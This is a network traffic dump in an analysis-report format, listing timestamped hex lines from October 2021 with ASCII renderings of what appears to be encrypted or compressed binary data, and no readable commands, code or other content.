                                                2021-10-13 18:35:47 UTC135INData Raw: 09 eb 1d f7 09 3d de 1b 5e b0 b5 2b dc b9 d9 9b 74 0a 7a 19 cd f8 0f bf de 75 ab 31 cd 59 c3 c1 c9 ef f8 f0 73 8d ea ab 2a ee c3 c6 d8 48 4a b8 84 1b 57 18 f1 5f 86 c3 68 30 6e be e9 be 4f c0 54 f1 76 c9 e5 61 39 0e 5c 7c 8d 6c a4 2e c7 74 a1 48 b9 07 94 f0 23 c6 75 87 49 3e fd 34 63 e7 0b 7f d4 43 28 3d 14 33 b5 a3 0f ae b2 a6 76 6a 87 5e a0 95 7d 57 77 a3 15 b9 d7 36 a7 f8 dc dc c0 5f 3b d7 9b 17 6c e4 8d e7 10 33 02 07 80 87 15 37 10 ea f3 45 42 64 c6 2f e9 7b b0 b5 e3 bc 49 d4 99 6c 08 0c 39 e1 9e 62 79 15 1d 54 59 c3 d9 ea 1a 46 a2 37 9c 91 41 24 09 8d 5f 00 97 71 96 e9 ac 13 ff ea 36 50 9c f8 0c ec 2a 82 aa 7b 8a 4b 89 dd 92 e1 a2 97 cb cb 41 2d b6 7f be 20 46 14 05 98 2a f5 5f 5a f4 d8 0c 21 52 3f 42 54 43 ce 5f 4d 44 fe ef f3 1a 24 12 25 55 61 79
                                                Data Ascii: =^+tzu1Ys*HJW_h0nOTva9\|l.tH#uI>4cC(=3vj^}Ww6_;l37EBd/{Il9byTYF7A$_q6P*{KA- F*_Z!R?BTC_MD$%Uay
                                                2021-10-13 18:35:47 UTC137INData Raw: de 82 95 ba d7 57 24 ea 82 af cc d6 48 96 0b 92 e9 50 d0 66 90 4e 58 57 c1 63 f7 5b 96 d5 92 f3 f6 06 01 80 2c 54 28 f1 66 c7 66 b6 a9 17 b3 16 50 90 b9 b5 01 32 d7 63 46 65 f8 e2 3b 11 8e 6b d7 8b 93 0d 0d dd b1 03 b9 ef a5 a1 a4 41 56 e4 5c 19 3f 3b c2 25 ea d2 c3 c7 ee 59 a0 dc 06 02 57 d8 be 8d 1b aa 86 d6 ea 49 a0 b5 02 9f d9 c2 56 57 34 6d 8c 7b 75 b8 59 96 f1 ae 7c 65 16 22 d6 33 b7 1f bb e0 5e ff 91 38 95 74 a1 ce 21 ec fd 34 90 58 55 8f 18 e2 57 c5 d6 09 98 f4 32 eb f6 88 2f 99 79 d3 58 b8 88 80 33 bd ac d9 97 69 9b 68 4a b9 ad 46 79 e6 8b 6d bc 24 04 25 b6 2e d0 ad 90 a5 65 fd df 36 cb 74 ac d8 19 25 8c 3a 13 b2 ea 8b 52 53 2a cd 61 40 05 d0 9a 43 3f 17 e7 a5 a5 18 7d 6e e8 7e 22 3f f0 a4 9f 10 22 ed 67 65 c5 9f 11 ba a6 7f c4 50 4e 54 7a 1d ed
                                                Data Ascii: W$HPfNXWc[,T(ffP2cFe;kAV\?;%YWIVW4m{uY|e"3^8t!4XUW2/yX3ihJFym$%.e6t%:RS*a@C?}n~"?"gePNTz
                                                2021-10-13 18:35:47 UTC138INData Raw: ab 38 6b 58 51 ff 88 a4 3a b5 93 0a ae ae bf 85 4c e1 bc d8 13 51 c7 fc 00 c7 e7 88 75 7e a9 24 77 b9 70 13 a3 53 d3 c4 43 b9 81 0f bf ca 88 0b b6 95 d9 be d4 20 43 1e dd 8a cf 1b 92 f2 25 2b fd 49 68 02 20 46 37 23 4d 31 97 b4 a3 3e 25 4b 2e f3 4e 72 a4 02 2d a6 be 3f db bd 29 c5 f6 13 cd b8 cd c7 a4 ac 6f 63 92 75 88 2a d7 6a 30 11 06 fe 75 2c f7 4e 48 9b 51 a1 d3 d2 7a 26 e3 bf f6 60 d5 d0 e9 b1 36 a8 b6 00 aa df 3e 9f 04 ac 7b 87 5d e6 63 fb 60 6c 11 12 db cf e2 3e 8f 16 2c cb 25 e9 e6 36 92 e3 a7 8e 52 7f ad 3f 68 df df 8c d9 9a e3 83 ae 42 ed 44 b4 a9 24 fd 83 ef 02 0e 26 f8 7f 0f 98 ea 22 ad f6 84 c8 69 81 bb f0 71 2e b9 c7 fd 6f aa 4e 26 7b ab 39 0f bc 68 ed a6 d0 79 a8 87 ef 6e 2a e6 24 31 30 f1 f5 8f 87 4e 57 cd 89 81 08 f2 82 3a 97 6a 3e b4 8f
                                                Data Ascii: 8kXQ:LQu~$wpSC C%+Ih F7#M1>%K.Nr-?)ocu*j0u,NHQz&`6>{]c`l>,%6R?hBD$&"iq.oN&{9hyn*$10NW:j>
                                                2021-10-13 18:35:47 UTC139INData Raw: 84 d7 8c c7 6d 54 bf 3c 7c 2b 72 1e 52 b5 00 11 a5 59 d1 14 81 3d 28 52 b9 42 12 38 8d 70 ad ce 86 78 30 e3 0c 98 d8 0b a1 23 c7 e4 00 0d a5 ac 77 b4 97 cc 11 91 ad c4 b3 21 4e 4a 5d ef 40 9e ad d1 e5 b4 b5 32 c6 87 d0 50 95 5a 63 8b 8e fe 04 a3 36 4b ed 6d 32 1e e3 41 6a 14 15 17 66 b8 56 52 53 74 08 13 05 7f bd c8 66 4b 0d 08 bd 66 71 9d 9a 40 a7 29 6a 09 47 d7 fe 75 2a ed 41 21 b6 01 bc 6d 8c d4 35 e9 0d 23 d1 e3 a1 3c 75 17 17 51 c8 6d a4 08 b1 03 95 74 5a 55 39 b4 33 04 11 ac 81 86 69 42 94 f0 ce ce ba 66 93 b1 6f 8f 5f f2 d5 da 16 08 cf 4c e3 b9 d7 90 eb b5 33 04 97 da 2d 6b 9f b9 05 94 0c 9b 25 5f e8 39 bc e5 21 47 26 e8 1a 25 20 c7 56 b2 f5 4e 59 d3 99 da 29 57 d1 e4 6e 11 98 d4 24 4d 93 71 86 d6 e4 fe f7 52 e4 c8 47 28 f8 ec 00 22 ff b2 31 99 3a
                                                Data Ascii: mT<|+rRY=(RB8px0#w!NJ]@2PZc6Km2AjfVRStfKfq@)jGu*A!m5#<uQmtZU93iBfo_L3-k%_9!G&% VNY)Wn$MqRG("1:
                                                2021-10-13 18:35:47 UTC141INData Raw: 74 13 a4 b6 23 16 0f bc 5e 84 20 21 58 51 dd c7 1b 09 92 19 05 84 9d 74 3c 20 1c ec 08 bc 09 0a 1e c6 d1 31 06 3d fe 2a ac ef 1b 52 a5 2e 31 57 36 35 ee f8 98 f3 09 83 0d b0 f1 52 11 a8 c7 e5 fc ff 82 d8 b4 b1 2f 6b b4 e5 b4 b4 6d 61 76 13 66 0b 62 98 5f c2 81 b8 f4 84 7b 73 b7 80 d9 a1 ef 0c 32 b3 2e c4 ff c4 e6 37 0b db 4f 76 e3 a5 7e 8e cb e6 39 16 72 43 06 f3 f7 40 97 73 97 c1 37 31 60 7a 22 30 41 21 58 4d 38 64 c1 38 91 77 bd 6e db 2d 6a 05 78 f1 4e c6 67 f9 5d f9 73 be 9b b8 40 58 8b 4e 19 15 9b 29 8f f3 70 ff fa 6a a0 a1 02 10 38 a7 f1 79 a4 b0 42 0f a3 e9 eb ac a2 9e 3c cf e9 06 11 be af 11 b7 26 e2 07 f1 96 a9 0e 37 08 14 0e 9f f4 7b b8 48 b3 59 0b 95 b1 54 e4 4b 22 8a c4 8d 3e 0c 62 69 cc 65 da ff d2 71 a8 7d 04 96 fb 78 24 4e b8 76 2e ec 4d ea
                                                Data Ascii: t#^ !XQt< 1=*R.1W65R/kmavfb_{s2.7Ov~9rC@s71`z"0A!XM8d8wn-jxNg]s@XN)pj8yB<&7{HYTK">bieq}x$Nv.M
                                                2021-10-13 18:35:47 UTC142INData Raw: 6b 9f 20 d0 be 24 2b 3b 1d 33 09 53 b2 0d d0 6e 09 9b b1 4b fa f9 45 1c d6 c7 80 ec 7e 2f 31 75 5c 1b 97 45 35 e0 38 46 d9 5a 77 a4 e3 b9 09 ea f6 a2 9f 0a 0b 60 d5 c2 5e 7c 25 6a 04 40 87 8b bb 9d 65 e6 28 b4 b7 6a 1f 92 51 8d 5c 63 ee e7 a7 4c bf 13 02 40 9e 98 ec 7c 3d 60 76 fc 50 07 9e 81 be 26 fb 16 3d d1 44 e2 2c fb 79 89 50 17 a5 da 7b 41 13 bd c6 66 e3 61 02 1c d1 1d e4 25 5a 5f f3 7f 55 6a a9 28 34 d3 97 78 27 49 0b 1c 77 0a 18 3c 8f bd 1e 21 4e 5e 81 0e 94 fd 7c 3a b2 23 a1 27 70 0d 49 e1 84 8d 50 ff ab 73 a5 f0 b6 65 cd 45 c5 42 ae a8 98 da b3 1b 69 8d 5b bd c4 e8 07 45 19 a7 f3 e6 3f 07 9c dc b9 e5 4f 2a 6d b4 0c cb 4c b6 bb c6 57 72 66 5e 7e 2e a5 1c 7d c7 1e e1 46 16 a1 0b a1 0a 2b 8d 22 e6 3b 0c 98 27 7a 7b b6 52 ad 6b 82 3e 87 79 1c 2d d8
                                                Data Ascii: k $+;3SnKE~/1u\E58FZw`^|%j@e(jQ\cL@|=`vP&=D,yP{Afa%Z_Uj(4x'Iw<!N^|:#'pIPseEBi[E?O*mLWrf^~.}F+";'z{Rk>y-
                                                2021-10-13 18:35:47 UTC143INData Raw: 3e f0 74 54 44 de 1a 0d c1 63 b1 22 81 a6 48 c1 55 9f 05 d4 04 dc 7f 4f f9 5e 33 08 35 b8 b0 29 a7 f3 08 0d bf db a9 16 40 9e 54 a9 49 2c ed 4a f4 d1 b1 37 dd 21 17 aa 85 50 05 87 79 a9 d6 b3 65 ed 46 af 69 9a bb d2 af cb a6 92 fc e4 1f 4b 1d 45 e8 8a 83 5d fa c8 45 28 a1 00 cd 8f b4 e4 28 ad 30 2a 82 8f 0b a9 5c 60 a2 ed cd c7 e4 9f 1c 08 70 ed 1d 54 75 87 82 57 2b 2b 63 b9 c6 aa fe 1b 1c d1 bf da d2 02 83 61 f1 00 08 c6 04 df a3 1b 67 fc 2e 8f 87 18 38 cd f1 98 87 93 45 30 a6 93 b6 c6 bf 82 35 47 3a ac 44 40 55 fd d8 e4 66 77 a4 91 fd 18 8f 5f fc bb d3 ca 73 71 76 65 fa c4 48 9a d1 65 df 23 4c a5 4c a3 eb 89 eb 83 f7 f7 11 a1 0c 22 e4 8f ce 43 2a e1 48 50 01 95 73 99 56 6b 26 7b 0d b2 ba a6 7c 70 0c 37 0c 65 fe fd 6e 1b 72 ba fa 6e 19 40 cf ec 73 99 9f
                                                Data Ascii: >tTDc"HUO^35)@TI,J7!PyeFiKE]E((0*\`pTuW++cag.8E05G:D@Ufw_sqveHe#LL"C*HPsVk&{|p7enrn@s
                                                2021-10-13 18:35:47 UTC145INData Raw: 11 41 9b 78 9e 4c 8f 04 2d a3 4b 60 20 d3 c4 45 1b 6c e2 c8 71 92 eb ad b6 f1 d1 fb 7b fc f3 aa b6 1c 39 fe e5 a4 8f 5b d5 65 08 d6 17 b3 3e b1 e7 d1 51 fc be f2 b9 02 77 3f 1d ed df ec e2 43 8d 93 5b 17 23 93 1c 54 65 32 aa 9e 50 32 3b 40 ae 67 8c 07 eb 72 2b df bf a2 46 d3 45 84 9d 78 aa 5c 16 ae 9c 51 73 8f 99 1f c9 cd 7f f4 36 4f bc e0 09 99 6f 24 17 d9 10 d6 cb 00 90 2f 12 34 6b dc cb 4b ab 9a 80 2a f4 83 48 52 f5 8a fe 0c 93 ce 63 fe fe df 35 42 cb e8 35 43 31 c3 b2 14 1a 78 f4 7b ac ba 5e 51 55 f1 31 61 f4 65 3a f2 f8 ea 10 96 42 8e 15 2c a0 82 83 03 51 54 03 4a 69 bc a6 04 bc ee c9 c7 5a 00 0a fb d6 10 37 1f 49 06 65 ff 36 8c eb 00 5c c6 8c 80 3c 8b 9a 4c 51 cf d2 92 01 80 32 e0 22 38 37 97 71 9b 6c 2d 36 9d 50 fe 07 04 1b 44 b1 08 0d 63 12 ee 8e
                                                Data Ascii: AxL-K` Elq{9[e>Qw?C[#Te2P2;@gr+FEx\Qs6Oo$/4kK*HRc5B5C1x{^QU1ae:B,QTJiZ7Ie6\<LQ2"87ql-6PDc
                                                2021-10-13 18:35:47 UTC146INData Raw: d4 a4 8f 5b bd cd a3 0d 16 fd cb 0d a4 8c e0 1f cf aa 09 92 e4 96 3a ea 80 f4 8d 57 f7 66 84 c5 de 18 38 a7 a7 8c e4 e5 80 01 f3 97 5b 59 47 1a 08 3c e3 6c 36 77 3a a2 5a 92 0d b1 09 7c a3 08 12 bb 44 1d be 72 b9 74 38 3e 36 3c 30 d5 b4 06 41 36 36 5e 2c cc 49 2e 18 28 02 a8 8f 46 a5 af e1 3c 7e 28 f8 cc 44 48 48 1f b8 40 87 45 96 77 b2 a8 8e 69 6a 54 4e 53 77 6f 84 c4 5d 5b 0a 3a 84 cb 06 c0 55 ca 6a 38 31 3a 97 3e 9e c5 d8 3f 22 48 4d a1 00 04 b3 e0 2e 4c 71 c9 8c 60 da 47 0f 88 ce 94 08 32 ec 3d 1a 78 54 03 bd fe 5f 51 eb af 3f 06 86 73 94 ec 3d fa 0d bb 23 9a b9 ea 11 87 d5 a6 92 e9 a1 e1 7b ab cf 3e d1 e0 16 14 e8 89 b2 54 57 df 84 da 09 84 f5 ef dd be 98 96 e1 81 fd 40 af 1d e6 c2 ce 7e 3d a3 c1 de fd a4 d6 32 a1 6c e7 52 c1 ff 46 30 94 83 48 b3 dc
                                                Data Ascii: [:Wf8[YG<l6w:Z|Drt8>6<0A66^,I.(F<~(DHH@EwijTNSwo][:Uj81:>?"HM.Lq`G2=xT_Q?s=#{>TW@~=2lRF0H
                                                2021-10-13 18:35:47 UTC147INData Raw: a9 44 85 46 66 47 15 90 5d 46 9a 2d b1 26 a1 28 0a b0 4f be 5a 79 44 e6 0e 2c f7 e4 96 f6 cb ec d4 6c 0b 4c b5 20 db 95 de 57 9a 14 35 05 93 7f ce 2b 3b 20 6b d6 1c 72 cc 54 5f e4 20 d6 42 ac 92 48 8c dc 13 ba fe 24 c8 49 05 51 7a 48 83 67 4f 84 ca 8c a9 0a 67 3a 2b b8 13 a3 b8 70 04 ec 4c ab 6b 84 a9 a9 dc 09 e9 78 77 36 15 aa 7f b0 d5 65 95 8f b9 91 63 ea 68 4e ad 3a 22 7f bf 9b 40 2f 91 1b 1f 48 bb df 4f 26 f9 5a 5a 5f ff 3c 8d b5 1a c8 23 45 1a ff 5b 7a 0e 83 41 22 31 a9 0e 1b 60 44 70 82 5f 8b 0d 65 57 87 1d 62 fc cc cc db 3b fd 75 26 c9 ed f9 97 21 7f 5b 9a e4 91 f1 47 6b 86 bf da 07 97 71 c1 d8 4a b5 00 bb a3 0f 92 c3 42 be e4 30 ed f9 90 f2 e6 ea f9 91 53 74 bd 24 78 70 1e c6 6c 44 ad 31 67 e3 13 57 3e 05 99 75 da 0a 2c 27 d6 b1 bf c4 52 5d 75 0e
                                                Data Ascii: DFfG]F-&(OZyD,lL W5+; krT_ BH$IQzHgOg:+pLkxw6echN:"@/HO&ZZ_<#E[zA"1`Dp_eWb;u&![GkqJB0St$xplD1gW>u,'R]u
                                                2021-10-13 18:35:47 UTC149INData Raw: 15 bb 72 3d 04 dc 06 29 51 68 26 2e 8a a4 cf 46 03 ee bb 8a 14 04 44 05 4c e9 98 c1 86 37 c6 ad be 5f e6 17 37 e1 10 49 f0 c1 87 7e f0 2f 37 47 87 35 4b e5 7d df 24 a8 02 b6 62 0c 22 cd 29 5c 2b 6e d6 a5 50 7c fb c4 e5 cf 2d c4 58 d1 2d da 89 1e 7b 63 c3 db d4 b4 4a f2 47 dd 3a fb 5e 0e 5e 33 7a ae d1 17 c8 44 30 4b 97 62 26 12 93 3d 3a 4c 2b 99 cf 37 4b 59 fe a4 6d b2 58 46 a6 02 01 71 fe 61 6d 01 f7 88 3e 1a 77 7d 82 f2 68 2b bd fb ee 47 ca 9a 25 d0 e6 5d 2a f7 5e 2b 64 bc af 8f 17 9d 0b 4e d0 ba a2 5d 8e 11 34 72 c4 44 51 e4 4a 4c da d4 03 7d 1c 3f c6 e8 03 d2 72 c3 85 23 90 35 98 96 2a 18 ca 0b c0 59 ba d9 82 8a 07 37 7c 4c fd c6 ee b2 59 ac c2 d8 c2 d5 75 bd db 8e 65 91 c4 85 3c 77 6e 84 0b 00 bf d2 7a ac 3c 74 26 96 33 2c 61 13 b4 96 7d 78 25 d5 f5
                                                Data Ascii: r=)Qh&.FDL7_7I~/7G5K}$b")\+nP|-X-{cJG:^^3zD0Kb&=:L+7KYmXFqam>w}h+G%]*^+dN]4rDQJL}?r#5*Y7|LYue<wnz<t&3,a}x%
                                                2021-10-13 18:35:47 UTC150INData Raw: 7f e2 00 b9 83 3a 85 01 83 f8 8c ba 42 f5 54 f9 0b cc 68 42 b8 b2 a6 8a d7 93 54 97 04 c4 61 28 43 69 6c d9 c6 10 55 ea f2 8c 04 b1 5a 76 c8 f6 33 e0 d7 93 6e 0f 86 e6 1d 18 c3 d4 01 90 0c cd d9 97 6f 97 2c ee f8 08 b6 82 37 0f a9 00 1b 50 5e fd b4 d1 f2 cc cc 24 d6 e1 e4 3c 7c f2 ce e5 2b 0b a8 80 45 56 48 fb 6d 0d bf c8 7c 2f 40 b6 8e 74 83 79 6b c8 2d 5a fd db a6 8d 5a 7a 67 fc 73 05 d6 05 9c 4f a0 cb a5 04 43 2a c7 ca ca e8 e7 b1 2d ce ea d1 29 53 28 e1 f0 ee ff c9 06 7a 2e f0 24 6a 2d 67 e4 28 c0 73 7f 6f 0f 22 1e c0 45 c3 02 10 c2 91 28 93 48 80 92 63 9d 72 00 b1 f6 c4 bc 95 21 29 8d 30 4b d5 3a 97 5a 71 a5 b7 9e f6 d9 84 70 de 0f 36 f9 3b 11 b8 fc 8e c9 44 c5 e7 bd cb 92 c0 58 bd e5 ac a5 a3 3e 89 f6 af 3a 91 a7 3c ac c3 10 1c 2c 49 19 9a 34 ab ce
                                                Data Ascii: :BThBTa(CilUZv3no,7P^$<|+EVHm|/@tyk-ZZzgsOC*-)S(z.$j-g(so"E(Hcr!)0K:Zqp6;DX>:<,I4
                                                2021-10-13 18:35:47 UTC151INData Raw: f8 0f 7e eb 98 16 99 93 fe 9b 5e 34 ea 8e a9 c5 93 66 57 1a a2 5f ed d7 00 7e 33 15 01 78 f9 1f 45 04 a3 ba 39 0f a3 ef 0f bd 70 2f ae 86 7d 71 b0 84 5c df c5 d2 69 df 50 c3 74 d9 cb ed 02 10 17 93 f0 25 93 6f 85 fe 72 fb ab 58 e0 be 1e a9 3a 61 b9 d7 d2 61 bc 52 0f bd ca 6a 04 3f 02 d2 ca bd 9c ca 4a e4 2b 29 64 e8 c5 ea 3f 1d 58 aa 56 bd 19 52 f0 75 8c 17 86 94 ef f9 56 50 6f 8d 9d 59 f2 2b 8d 62 bd c4 2e 2b 75 14 f9 e5 68 63 cb f8 50 17 90 5e 87 fd c5 58 4f cb fb 54 7d 85 2d aa d8 87 5f e1 ad 03 68 7d aa 26 0f 9a f8 d0 72 fb db bb da 11 a2 b2 13 be 23 40 96 0b e9 ad 98 46 a9 11 ac bb 29 2f 67 c8 50 db e1 a3 19 5b 55 10 3a 0a 4f 84 d2 69 3e 70 c4 5a 5f ea 82 b5 2b 60 d9 9b 6e c9 83 55 d3 82 39 14 a5 1f b4 4e 59 d3 94 f0 9b 8a a2 f8 d9 b2 10 0d 94 e3 a3
                                                Data Ascii: ~^4fW_~3xE9p/}q\iPt%orX:aaRj?J+)d?XVRuVPoY+b.+uhcP^XOT}-_h}&r#@F)/gP[U:Oi>pZ_+`nU9NY
                                                2021-10-13 18:35:47 UTC152INData Raw: 43 31 60 73 d9 97 35 1c 7e 45 39 2b d5 48 a7 27 58 6d 16 c1 cf f9 5c 85 97 6b 6c e4 87 50 48 a5 a3 cc 24 cf 49 d4 10 ca a6 bd f5 72 a3 92 c8 ac 8b 64 0d 7e 0b 4c 2c d9 43 eb 88 6a c6 11 4a e9 94 02 2d 7e ea 4f ff d5 66 cb 7f f1 42 a7 10 1a f9 bf 9b 70 a9 68 90 d6 3a e0 b2 2d d8 93 7d b8 f2 0a 11 17 61 e0 cb 0f a4 9b 73 b3 d0 c0 ee c7 e8 23 6d 3a b5 a8 be d6 ac 0d be 5b 03 de 0d 43 e2 38 35 25 1c cf 4d 86 19 5f e0 2f 3b 1b 48 af 34 bb 58 aa cd f5 52 af 90 13 b6 b7 29 5c d5 60 be 42 a4 92 cf 56 44 cc 7f b5 83 f2 1d 57 cd ed 69 dd c8 34 0f 85 d0 34 4c bd d0 9e 5b e0 97 ba 5d 59 db 82 20 d0 93 0d a3 e7 14 00 1d f2 5d ed 5a 4a de 8f 18 7e 31 6e 17 0a a6 5f f6 d5 92 d2 5a b4 4c 78 23 44 b6 16 b5 62 75 96 0b 4c 13 aa 9d 73 2e 92 68 21 e1 1f 8d 74 fd 56 d9 cf 9e
                                                Data Ascii: C1`s5~E9+H'Xm\klPH$Ird~L,CjJ-~OfBph:-}as#m:[C85%M_/;H4XR)\`BVDWi44L[]Y ]ZJ~1n_ZLx#DbuLs.h!tV
                                                2021-10-13 18:35:47 UTC154INData Raw: 5c 77 8d 70 3e 05 84 f4 c9 f2 75 2e 14 8e 02 05 97 7d 42 ea 3d 7e 5c 72 11 12 0a 16 3a 90 5c 4f d1 15 d2 6d 66 22 e5 a5 58 4a 54 a0 86 8a df b0 9b 5d 49 b1 36 98 f5 b5 f4 d5 ad 1c f3 be d0 49 e4 8f 88 ce 1c b3 36 62 28 1d 3d 94 07 aa 20 32 4e d0 53 c6 61 e8 07 26 ac ab 0a 82 b2 8f 44 b2 ea c3 cc 71 80 8e 74 02 04 0a 1d 12 2f 4f 12 86 d7 86 c8 66 63 ed 42 a9 b1 d4 4a b6 ad cd 10 3b 10 37 1f b3 eb 94 d8 fd d0 28 e8 2b 6b 18 fb e1 b8 4b 88 0b bc f3 92 ea d3 d4 0f a2 82 a6 40 a3 1c cb 24 c4 47 24 d2 0f 10 21 b4 5b ee d2 79 a9 33 15 7f 8b e9 57 dc 15 a1 09 37 d3 03 82 34 3a 5c 77 42 72 11 10 5b e6 2e f4 e0 7b c2 b7 54 91 33 0e 1e 0d d8 81 bb dd 8d 5e f0 77 e1 a4 85 fc 14 cd 17 7a 07 23 b8 5f e0 2b 68 2e c1 6e bd 83 56 5f e3 3f 16 21 4a b4 fe f2 ff dd 55 e0 3f
                                                Data Ascii: \wp>u.}B=~\r:\Omf"XJT]I6I6b(= 2NSa&Dqt/OfcBJ;7(+kK@$G$![y3W74:\wBr[.{T3^wz#_+h.nV_?!JU?
                                                2021-10-13 18:35:47 UTC155INData Raw: e4 27 74 14 ad f0 e1 b6 af 68 72 fa 32 35 55 cb db 42 de 07 f3 5b fb 6a c0 25 9e 80 9a 0c 15 af 29 81 9f c1 93 68 33 99 c1 a6 80 2d 9e dd 98 10 53 0e 12 87 f9 78 0a 82 91 50 5f f1 aa 54 0e c0 a3 0e 3a 9f 0e 99 b4 e1 98 41 13 bc 2f af c9 53 11 b3 37 06 2d 41 90 05 9f 1b 47 33 9e a7 63 f4 d0 c4 89 4f b8 8e ee 79 84 df b2 07 77 6b 8a da 17 93 42 1c 7d 19 41 28 ee 5a 35 43 37 08 b6 61 e1 49 69 80 30 b3 42 47 60 68 bb 6e 47 44 45 9e 5c 7b b3 33 36 1f a4 db 90 ee 74 d4 0e c5 4a d6 58 0a f4 33 c5 dc 0e 38 a3 99 ce 3f 06 1a 70 67 fc e9 9e 39 b8 83 43 25 47 16 06 b4 00 38 85 5d 5e be 45 4e 8f 66 99 ec 13 60 6c f0 47 31 5f 56 66 2d c5 60 4b 88 50 aa 37 10 2a eb b8 6b b4 e5 a6 9a fa c7 08 f6 cf ee dc 10 71 94 d3 50 e9 bc 42 a1 09 87 ef e6 15 b4 bd aa 0d 32 6d 8f 50
                                                Data Ascii: 'thr25UB[j%)h3-SxP_T:A/S7-AG3cOywkB}A(Z5C7aIi0BG`hnGDE\{36tJX38?pg9C%G8]^ENf`lG1_Vf-`KP7*kqPB2mP
                                                2021-10-13 18:35:47 UTC156INData Raw: 3e 83 5f ad 0b 98 52 e8 27 75 96 55 1d 25 e6 af ce 76 22 ce 99 ff 2f 6d 93 61 f7 48 4e 40 b9 57 53 96 e0 3c 72 c2 4c 0b 6b c4 46 4a d5 88 f6 d7 97 7a d5 9a c0 c3 25 02 02 10 c6 a9 10 94 31 38 1e ae 4f 16 32 18 3f 18 69 56 b8 00 09 78 46 b4 8f e7 50 b6 b1 2f 77 92 95 b0 89 60 d0 c4 d6 1d 43 26 7b d7 e9 a2 8c 6a ca 67 4f 16 68 41 9b 00 19 f8 0f f9 41 03 af b1 ef 59 c5 c9 0f 66 78 03 a4 07 f2 0b a3 01 64 a0 9a c6 45 a9 12 32 f9 46 8e 38 16 0a c8 5f ce 02 d1 d7 6f 32 cd 2b 9a 80 11 a4 8a d2 98 eb 34 1a 18 9d c3 f1 af b1 cd 56 00 1c d3 95 4e 7f 5a 0d b2 db 3a eb 7c 46 a9 15 0b eb ad 3d 07 d7 4f c2 4d 24 31 09 0f 4d 42 02 b2 d8 93 82 49 9c 1a b8 d6 b0 d3 24 6c 6f 83 77 14 40 9d 9a 83 8d eb c0 80 df fa 08 a8 ff ab 96 94 47 08 a8 fd f1 fc 92 71 72 78 d4 b3 50 cf
                                                Data Ascii: >_R'uU%v"/maHN@WS<rLkFJz%18O2?iVxFP/w`C&{jgOhAAYfxdE2F8_o2+4VNZ:|F=OM$1MBI$low@GqrxP
                                                2021-10-13 18:35:47 UTC158INData Raw: 2b 8b 06 88 f6 4a 66 4a 0b 04 3f dd 9f 94 44 58 03 1a ef a3 af 94 81 b3 5a 8b ea 49 3c 2b 0f ae 4a d6 3a 4d 24 d8 5d 93 5b 28 8b 46 1e 33 d0 d3 41 52 43 3c 3f d9 69 5d 8e db d3 bc 2c fe 22 a1 03 1f c7 3a 5e d9 fe c2 e5 ce 51 fc 31 21 5c b1 7d 71 b5 db 30 1d d2 9b 6d 8f 56 71 bd 2a b8 56 7e 57 16 82 51 e5 ab a5 3c 94 ff 9a 85 8d c4 57 da c3 de ef 08 09 52 ee cb ee 00 1f d5 db 9e 4f 62 67 fe 29 7a a9 42 a9 f4 63 4f 4c b3 23 42 a1 8c ef 40 51 54 40 90 2d 64 fd 33 13 74 b6 aa 90 26 f6 26 b7 21 81 28 e0 3f c0 43 d1 b5 27 dd 69 6b 05 92 e4 33 0f 20 f0 d8 d8 a4 96 ed 90 f0 4d 6f 9d a4 08 11 b9 03 95 ec 73 97 a1 9e 91 76 ed 4a 35 5c 7d 56 ba fb bb d3 98 f1 53 49 1b 53 1a 5b ea 20 1d 40 60 35 00 c3 44 a2 99 b6 be c0 04 1f 87 df 83 4c 7e 83 ab 9b bb d0 60 66 c9 2c
                                                Data Ascii: +JfJ?DXZI<+J:M$][(F3ARC<?i],":^Q1!\}q0mVq*V~WQ<WRObg)zBcOL#B@QT@-d3t&&!(?C'ik3 MosvJ5\}VSIS[ @`5DL~`f,
                                                2021-10-13 18:35:47 UTC159INData Raw: 3a 61 bd c7 e1 a3 b5 75 81 00 27 65 62 94 a1 1d 58 f8 33 6c 1b 5f 2b dd ea 31 9c 80 37 13 7a c3 a2 87 a4 ff 62 67 9e 28 58 79 19 12 36 6d fc f0 0f cf da 04 17 be 45 12 01 bc f6 71 a5 d2 30 f5 1d ce a9 09 69 4a 8b 51 e3 8a 37 af 1e ec 92 b6 a8 23 24 f7 71 4a d1 96 c4 e4 ef 4a ab 3f 0b b7 6c 31 c8 cf 9d c3 bf e0 7c 56 89 2a e4 3c 9f 6a 91 13 66 3d 01 6c 30 bc 42 4a 9d 05 aa 97 38 be e1 c3 e2 5d 20 85 eb 8e 7e 61 f1 4b 30 37 62 71 8d 47 8e 1a de 69 6a 39 4a da f7 20 e6 cc 57 da 36 8a 98 c8 1a 2f 5e 2b c5 43 03 5e 15 b3 3a 9b 08 d7 c5 dc 6e a2 6a 77 ad 9e b2 cb d4 0e 7b 88 73 f5 6e 6e c8 35 a9 0a ec d5 a4 81 35 34 ac a7 e3 c7 dc aa 72 32 fa 2d c5 c9 58 74 37 07 63 cc 71 2f 06 34 92 6e 6d 88 74 a1 37 01 77 18 32 4e 69 b6 ad d7 b6 a0 af 93 04 31 95 87 64 9e ae
                                                Data Ascii: :au'ebX3l_+17zbg(Xy6mEq0iJQ7#$qJJ?l1|V*<jf=l0BJ8] ~aK07bqGij9J W6/^+C^:njw{snn554r2-Xt7cq/4nmt7w2Ni1d
                                                2021-10-13 18:35:47 UTC160INData Raw: 35 f7 60 7b 5e 91 54 54 45 24 d7 9e 0d c9 f8 dd 6a ba 45 22 d7 8a c8 77 32 fd c4 87 e1 a1 09 5f 52 42 b2 43 42 ac b2 3b 3d 1e c9 1d f4 ec 3b 0a 1d 5f e0 a2 3a 90 e4 2a f7 47 e6 b3 39 c5 47 3d 0e f2 2b 14 37 0d 54 6d 8c d1 78 d0 5a 59 c0 46 a8 8b dd f1 4c 69 21 44 a0 75 8c d7 9f 1e c7 56 94 e0 98 de 04 e3 70 1c 72 5b 0b 94 0f b6 b6 e7 f7 53 32 de 02 fa 63 eb bc 51 dd 9f 15 31 7c df 26 e3 bc 54 48 aa 91 a9 c7 76 23 5d 3f 0a cf 10 30 9a 45 21 52 1b 16 33 f5 21 56 fb d4 1c c7 f3 46 ae ba cb 84 d8 ef ff 62 69 8b 40 87 91 fa d7 53 5d fc e9 6d 39 1e b2 09 86 db d3 ba 57 55 f5 5c 72 eb dd 96 02 e1 a2 9f 0b b7 36 46 3c 9b 76 c8 73 9a fb 78 2f 18 dd f9 42 40 fb 74 87 e3 12 a7 10 4e 89 63 27 7f af 18 d0 eb 88 00 41 7b 87 6d 3e 07 ab cd af 37 65 3b a8 7a 74 af cc c5
